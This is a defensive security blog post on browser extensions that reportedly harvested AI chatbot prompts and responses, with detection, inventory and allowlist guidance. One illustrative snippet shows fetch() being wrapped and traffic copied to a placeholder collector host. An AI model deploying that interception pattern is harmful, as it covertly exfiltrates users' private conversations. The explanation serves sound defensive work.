Browser extensions can siphon AI chatbot prompts and responses. Learn how to detect and prevent AI chat data harvesting with endpoint controls and behavioral analytics.

Stop Browser Extensions From Stealing AI Chat Data
8 million users is a lot of "oops." That's the scale researchers reported for Urban VPN Proxy and related browser extensions that captured and exfiltrated conversations from popular AI assistants: ChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and Meta AI.
Most companies get this wrong: they treat AI chatbot usage as a policy problem ("don't paste secrets") when it's increasingly an endpoint problem. If a browser extension can sit between the user and the chatbot and quietly siphon prompts and responses, training slides won't save you.
This post breaks down what actually happened, why "marketplace approval" doesn't mean safe, and the controls that reliably reduce risk, especially AI-driven behavioral analytics that spot unauthorized data harvesting even when it's "technically disclosed."
What happened: AI chat prompts became an exfiltration stream
The core issue is simple: a "privacy" extension behaved like a data collection agent.
Researchers at Koi Security reported that Urban VPN Proxy (and several sibling extensions from the same publisher) collected AI chatbot conversation data by default in newer versions. Crucially, the data collection ran whether the VPN feature was connected or not, and users didn't get a clear in-product control to turn it off.
From a defender's viewpoint, this is the nightmare scenario for AI adoption:
- Employees believe they're using an AI assistant inside a normal browser session.
- The organization thinks risk is contained to the AI provider's environment.
- A third party on the endpoint captures the full prompt/response stream and ships it out.
Why AI chat data is more sensitive than teams assume
AI chatbot transcripts are unusually "dense" with sensitive material. People don't just search; they confess.
In enterprise settings, prompts commonly include:
- Proprietary source code, configuration, and architecture diagrams
- Incident details and logs during active investigations
- Credentials pasted "just for a second" to debug
- Customer records, regulated data, or internal financials
- Legal drafts, HR issues, merger plans
The uncomfortable truth: AI chat has become a shadow system of record. If you don't treat it like one, someone else will.
How the extension pulled it off (and why it's hard to spot)
Answer first: it used a classic interception technique (injecting scripts into specific sites) and then captured network traffic before the browser rendered it.
According to the researchers' description, the extension:
- Monitored tabs to detect when a user visited a targeted AI platform.
- Injected an "executor" script tailored for that platform.
- Overrode fetch() and XMLHttpRequest, the browser APIs that handle web requests (a simplified sketch of this pattern follows the list).
- Captured prompts and responses by intercepting the raw API traffic.
- Packaged and sent the data to remote endpoints associated with the vendor.
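To make that concrete, here is a deliberately simplified sketch of what fetch() wrapping can look like from inside a page. The collector endpoint and payload shape are placeholders invented for illustration, not the actual extension's code:

```typescript
// Simplified, illustrative man-in-the-browser pattern: wrap window.fetch so the page
// behaves normally while a copy of the traffic is shipped elsewhere.
// The endpoint and payload shape below are placeholders, not the actual extension's code.
const originalFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
  const response = await originalFetch(input, init);

  // Clone so the page still receives an unread body and notices nothing.
  response
    .clone()
    .text()
    .then((body) => {
      navigator.sendBeacon(
        "https://stats.collector.invalid/ingest", // hypothetical collector endpoint
        JSON.stringify({
          url: String(input),
          requestBody: init && typeof init.body === "string" ? init.body : null,
          responseBody: body,
        })
      );
    })
    .catch(() => { /* swallow errors to stay invisible */ });

  return response; // The chat UI keeps working exactly as before.
};
```

Nothing in the chat UI changes, which is why user-level review finds nothing; the detection surface is the hooking itself and the outbound beacon.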
This matters because it avoids many naïve "privacy checks." A user can review a chat UI and see nothing unusual. Even basic network monitoring may show traffic that looks like analytics. Meanwhile, the extension is effectively acting as a man-in-the-browser.
The signals defenders should care about
If you're building detection logic (or evaluating tools that claim to have it), this kind of behavior tends to generate a few measurable signals:
- Unexpected script injection into known SaaS domains (LLM chat apps)
- API interception patterns (wrapping web APIs, hooking request/response objects)
- Background service worker traffic to analytics/stat endpoints with compressed payloads
- High-frequency outbound calls that correlate with prompt submissions
- Cross-extension "family resemblance" (same publisher patterns, shared SDKs)
A human can't reliably watch for these. Automation can.
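One cheap signal automation can collect at scale is whether the request APIs on sensitive pages still look native: a wrapped function usually no longer stringifies to native code. This is a heuristic sketch, not a complete detection; determined code can spoof toString, so treat a hit as one weak signal to correlate with other telemetry:

```typescript
// Heuristic: native, unwrapped browser functions stringify to "function fetch() { [native code] }".
// A monkey-patched fetch/XHR usually does not. Spoofable, so treat as a weak signal only.
function looksWrapped(fn: unknown): boolean {
  return typeof fn === "function" && !Function.prototype.toString.call(fn).includes("[native code]");
}

const hookedApis = [
  ["window.fetch", window.fetch],
  ["XMLHttpRequest.prototype.open", XMLHttpRequest.prototype.open],
  ["XMLHttpRequest.prototype.send", XMLHttpRequest.prototype.send],
]
  .filter(([, fn]) => looksWrapped(fn))
  .map(([name]) => name);

if (hookedApis.length > 0) {
  // Forward to your telemetry pipeline for correlation with extension inventory and egress data.
  console.warn("Possible request-API hooking detected:", hookedApis);
}
```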
"But it was in the privacy policy" isn't a defense
Answer first: buried disclosure doesn't equal informed consent, and it definitely doesn't equal enterprise acceptability.
This incident exposes a gap between platform policy compliance and user expectations. Extensions can pass marketplace review, earn a "featured" badge, and still engage in data collection that would surprise most users, especially when the extension markets itself as privacy protection.
From a governance standpoint, I take a hard stance here: if an extension collects AI chat content, that behavior should be treated as high-risk by default, regardless of whether it's disclosed.
Why? Because disclosure doesn't change the impact:
- Chat transcripts can contain regulated data.
- The organization may have contractual obligations (confidentiality, DPAs).
- The captured content can be re-identified when combined with device identifiers and clickstream.
If you're a security leader, this is also a procurement lesson: "free VPN" is often a business model, not a gift.
Where AI in cybersecurity fits: detect behavior, not badges
Answer first: the most practical way to stop this class of threat is endpoint monitoring + behavioral analytics, with AI used to flag abnormal data flows and suspicious extension behaviors.
In the "AI in Cybersecurity" series, we keep coming back to one theme: attackers (and data brokers) thrive in the gaps between tools. Browser extensions live in a gap where:
- EDR may not fully understand browser internals.
- Network controls may see "just HTTPS."
- Marketplace trust signals create false confidence.
This is exactly where AI-driven detection helps, because it's good at correlating weak signals across time.
What AI-driven detection can realistically catch
You don't need magic. You need good telemetry and models that prioritize the right anomalies.
Effective detections often look like:
- Behavioral baselining: "This user's browser doesn't normally send compressed payloads to unknown analytics domains right after LLM prompts."
- Sequence detection: "Visit LLM domain → injection event → hook APIs → background exfil." That pattern is more meaningful than any single indicator (a minimal sketch appears at the end of this subsection).
- Publisher-level clustering: "Multiple extensions share code paths, endpoints, and permission sets."
- Content-aware controls (where permitted): identify prompt-like payload structures leaving the endpoint, without storing the content.
AI isn't replacing security controls here. It's helping you find the needle faster.
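To show what the sequence-detection idea can look like in practice, here is a minimal sketch that matches the ordered chain per device and extension. The event names and schema are invented for illustration, not a product's telemetry format:

```typescript
// Minimal order-sensitive matcher for the suspicious chain, tracked per (device, extension).
// Event names, the schema, and the lack of a time window are simplifications for illustration.
type EventName =
  | "visit_llm_domain"
  | "content_script_injected"
  | "request_api_hooked"
  | "background_exfil";

const SUSPICIOUS_CHAIN: EventName[] = [
  "visit_llm_domain",
  "content_script_injected",
  "request_api_hooked",
  "background_exfil",
];

interface TelemetryEvent {
  device: string;
  extensionId: string;
  name: EventName;
  timestamp: number; // epoch millis
}

// How far each (device, extension) pair has progressed through the chain.
const progress = new Map<string, number>();

function onEvent(e: TelemetryEvent): boolean {
  const key = `${e.device}:${e.extensionId}`;
  const step = progress.get(key) ?? 0;

  if (e.name !== SUSPICIOUS_CHAIN[step]) return false;

  if (step + 1 === SUSPICIOUS_CHAIN.length) {
    progress.delete(key);
    return true; // Full chain observed: escalate as a high-severity alert.
  }
  progress.set(key, step + 1);
  return false;
}
```

A real pipeline would add a time window and decay, but the point stands: the ordered chain is far more specific than any single event.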
The control stack that works (and what's usually missing)
Most organizations already have pieces of this, but not connected.
A practical stack looks like:
- Extension governance (prevent the risky install)
- Secure enterprise browser controls (limit what extensions can do)
- Endpoint telemetry + threat hunting (detect injection/exfil behavior)
- Network egress control (block known bad destinations, restrict unknown)
- AI usage guardrails (reduce the sensitivity of what's entered)
In my experience, the missing piece is almost always #1. If employees can install whatever they want, everything else becomes cleanup.
A concrete response plan (do this next week, not "someday")
Answer first: treat browser extensions that touch AI chat as a Tier-1 data risk, then reduce your exposure in three passes: inventory, control, detect.
1) Inventory: know what's installed and where
Start with facts. Pull an extension inventory from managed browsers and endpoint tools, and segment by:
- Publisher
- Permissions (especially "read and change data on websites you visit")
- Installation source (store vs sideload)
- User population (engineering, finance, support)
If you don't have centralized browser management, this incident is your reason to get it.
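If you need a quick, scriptable starting point before proper browser management is in place, you can walk a Chrome profile's extension directories and read each manifest. A rough sketch for a Linux endpoint with Node.js; the paths are assumptions and differ on Windows, macOS, and other browsers:

```typescript
// Rough inventory sketch: enumerate Chrome extension manifests on a Linux endpoint
// and flag broad host permissions. Paths are assumptions; adjust per OS, browser, and profile.
import { readdirSync, readFileSync } from "node:fs";
import { join } from "node:path";
import { homedir } from "node:os";

const extensionsRoot = join(homedir(), ".config/google-chrome/Default/Extensions");
const broad = (p: string) => p === "<all_urls>" || p.includes("://*/");

for (const extId of readdirSync(extensionsRoot)) {
  for (const version of readdirSync(join(extensionsRoot, extId))) {
    try {
      const manifest = JSON.parse(
        readFileSync(join(extensionsRoot, extId, version, "manifest.json"), "utf8")
      );
      const hosts: string[] = [
        ...(manifest.host_permissions ?? []),
        ...(manifest.permissions ?? []),
      ].filter((p) => typeof p === "string");
      if (hosts.some(broad)) {
        console.log(`${extId} ${manifest.name ?? "?"} -> broad host access:`, hosts.filter(broad));
      }
    } catch {
      // Missing or unreadable manifest; skip.
    }
  }
}
```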
2) Control: move to allowlists, not denylists
Denylists are whack-a-mole. Allowlists scale.
Set policy so that:
- Only approved extensions run on corporate profiles.
- VPN/proxy extensions are restricted to vetted vendors.
- AI assistants are accessed through managed browsers or managed profiles.
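On Chromium-based managed browsers, the allowlist itself can be expressed with the ExtensionSettings enterprise policy: block everything by default, then explicitly allow vetted extension IDs. A minimal sketch; the 32-character ID below is a placeholder for an extension you have actually reviewed, and the blocked permissions are examples:

```json
{
  "ExtensionSettings": {
    "*": {
      "installation_mode": "blocked",
      "blocked_permissions": ["proxy", "debugger"]
    },
    "aaaabbbbccccddddeeeeffffgggghhhh": {
      "installation_mode": "allowed"
    }
  }
}
```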
If you must allow some flexibility, consider a tiered model:
- Tier A: approved and monitored
- Tier B: allowed for low-risk roles only
- Tier C: blocked
3) Detect: watch for "AI chat interception" behaviors
Even with strong governance, assume something slips through.
Detection ideas that consistently pay off:
- Alerts on new extension installs or updates across the fleet
- Alerts on script injection events into known AI chatbot domains
- Outbound connections from browser processes to newly seen analytics/stat domains
- Data volume spikes correlated with chatbot use
- Long-running service worker activity that doesn't match user actions
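As one example of the newly-seen-domain idea above, a first-pass check over egress logs is easy to prototype. A minimal sketch, assuming you already parse proxy or firewall logs into simple records; the field names, the 14-day window, and the byte threshold are all assumptions:

```typescript
// First-pass "newly seen domain" check over parsed egress records.
// Field names, the 14-day window, and the 50 KB threshold are assumptions for illustration.
interface EgressRecord {
  process: string;   // e.g. "chrome" or "msedge"
  domain: string;
  bytesOut: number;
  timestamp: number; // epoch millis
}

const KNOWN_WINDOW_MS = 14 * 24 * 60 * 60 * 1000;
const firstSeen = new Map<string, number>(); // domain -> first observation time

const isBrowserProcess = (p: string): boolean => /chrome|msedge|firefox|brave/i.test(p);

function flagNewBrowserEgress(records: EgressRecord[]): EgressRecord[] {
  const flagged: EgressRecord[] = [];
  for (const r of records) {
    const seen = firstSeen.get(r.domain);
    if (seen === undefined) firstSeen.set(r.domain, r.timestamp);

    const newlySeen = seen === undefined || r.timestamp - seen < KNOWN_WINDOW_MS;
    if (isBrowserProcess(r.process) && newlySeen && r.bytesOut > 50_000) {
      flagged.push(r); // Candidate for correlation with AI chatbot sessions on the same device.
    }
  }
  return flagged;
}
```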
If you're evaluating vendors, ask a blunt question: Can your product detect a browser extension overriding fetch() and exfiltrating chatbot API traffic? Show me how.
Common questions security teams are asking (and straight answers)
"Does a 'featured' marketplace badge mean it's safe?"
No. It's a trust signal, not a security guarantee. Behavior changes after updates; badges don't prevent that.
"Is this only a consumer risk?"
No. Corporate devices are often the target because enterprise prompts are more valuable: source code, customer data, internal strategies.
"If we block one extension, are we covered?"
No. The pattern is the risk: extensions that can read/modify site data and intercept requests can be repurposed. You need governance plus detection.
"Should we ban AI chatbots?"
Bans push usage into personal devices and unmanaged browsers. A better approach is managed access + data controls + monitoring.
What this means for 2026 AI security programs
AI chatbot data theft is turning into a mainstream endpoint problem, and attackers don't need zero-days to do it. They just need a distribution channel, a plausible store listing, and a permission set users click through.
If you're building your 2026 roadmap, I'd prioritize two outcomes:
- You can prove what browser extensions are running in your environment.
- You can detect and stop abnormal data flows from AI chatbot interactions.
Those two capabilities won't just prevent this specific incident. They'll also harden you against the next wave: agentic workflows in the browser, AI copilots inside business apps, and more sensitive prompts moving through more endpoints.
If a tool claims to protect privacy while quietly shipping AI chat transcripts to third parties, the right response isn't panic: it's engineering. What would it take in your environment to catch that behavior within hours, not weeks?